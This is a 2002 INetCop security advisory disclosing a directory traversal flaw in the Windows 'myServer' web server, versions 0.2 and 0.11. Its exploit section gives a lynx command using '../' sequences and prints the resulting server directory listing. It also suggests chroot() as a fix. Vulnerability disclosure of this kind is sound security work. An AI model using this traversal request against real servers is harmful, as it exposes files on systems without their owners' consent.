|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: dong-h0un U (xploit_at_hackermail.com)
Date: Wed Dec 11 2002 - 08:57:46 CST
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
INetCop Security Advisory #2002-0x82-010
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- Our 10th advisory does self-congratulation.
* Title: Directory traversing bug in 'myServer' webserver.
0x01. Description
It's very useful Windows webserver that is offered by Binary of C++.
It's run in Microsoft Windows platform fortunately only.
They have plan to export Linux platform firstly at the future.
We saved Linux. :-)
Vulnerability happens because webserver does not filter "../".
Herewith, vulnerability can do exploit.
(Server has died sometimes. yeh~ It's bug!)
0x02. Vulnerable Packages
Vendor site: http://myserverweb.sourceforge.net/
myserver 0.2 binaries
-myServerEXEC-0.2.zip
+Windows 95/98/2000
+Windows NT/2000
myserver 0.11 binaries
-myServerEXEC-0.11.zip
0x03. Exploit
See and enjoy this.
bash$ lynx -dump http://myServerhost/../../myServerEXEC-0.2 > x82-x0x
bash$ cat x82-x0x
Contents of folder ../../myServerEXEC-0.2/
_________________________________________________________________
File Last modify Size
[1]cgi-lib 0/11/102-12:4:16 System time
[2]control.exe 3/11/102-10:48:28 System time 258048 bytes
[3]CVS 0/11/102-12:4:18 System time
[4]languages 0/11/102-12:4:18 System time
[5]libhoard.dll 3/9/102-6:0:0 System time 32843 bytes
[6]logs 0/11/102-12:4:18 System time
[7]MIMEtypes.txt 0/11/102-3:50:42 System time 276 bytes
[8]myserver.exe 3/11/102-10:49:2 System time 200704 bytes
[9]myserver.xml 0/11/102-1:11:46 System time 2238 bytes
[10]readme.txt 0/11/102-9:59:6 System time 1836 bytes
[11]REGISTER SERVICE.bat 3/9/102-6:0:0 System time 20 bytes
[12]START CONSOLE.bat 3/9/102-6:0:0 System time 20 bytes
[13]START SERVICE.bat 3/9/102-6:0:0 System time 17 bytes
[14]STOP SERVICE.bat 3/9/102-6:0:0 System time 16 bytes
[15]system 0/11/102-12:4:18 System time
[16]UNREGISTER SERVICE.bat 3/9/102-6:0:0 System time 22 bytes
[17]web 0/11/102-12:4:18 System time
_________________________________________
Running on myServer 0.2
References
1. http://myServerhost/myServerEXEC-0.2/cgi-lib
2. http://myServerhost/myServerEXEC-0.2/control.exe
3. http://myServerhost/myServerEXEC-0.2/CVS
4. http://myServerhost/myServerEXEC-0.2/languages
5. http://myServerhost/myServerEXEC-0.2/libhoard.dll
6. http://myServerhost/myServerEXEC-0.2/logs
7. http://myServerhost/myServerEXEC-0.2/MIMEtypes.txt
8. http://myServerhost/myServerEXEC-0.2/myserver.exe
9. http://myServerhost/myServerEXEC-0.2/myserver.xml
10. http://myServerhost/myServerEXEC-0.2/readme.txt
11. http://myServerhost/myServerEXEC-0.2/REGISTERSERVICE.bat
12. http://myServerhost/myServerEXEC-0.2/STARTCONSOLE.bat
13. http://myServerhost/myServerEXEC-0.2/STARTSERVICE.bat
14. http://myServerhost/myServerEXEC-0.2/STOPSERVICE.bat
15. http://myServerhost/myServerEXEC-0.2/system
16. http://myServerhost/myServerEXEC-0.2/UNREGISTERSERVICE.bat
17. http://myServerhost/myServerEXEC-0.2/web
bash$
We tested it, in Windows 98/2000 professionals.
0x04. Patch
--We decided it.
It can solve as chroot() function. Therefore, we don't compose patch.
Construct safer webserver.
--
P.S: Sorry, for my poor english.
-- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net
GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y --
-- _______________________________________________ Get your free email from http://www.hackermail.com
Powered by Outblaze
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]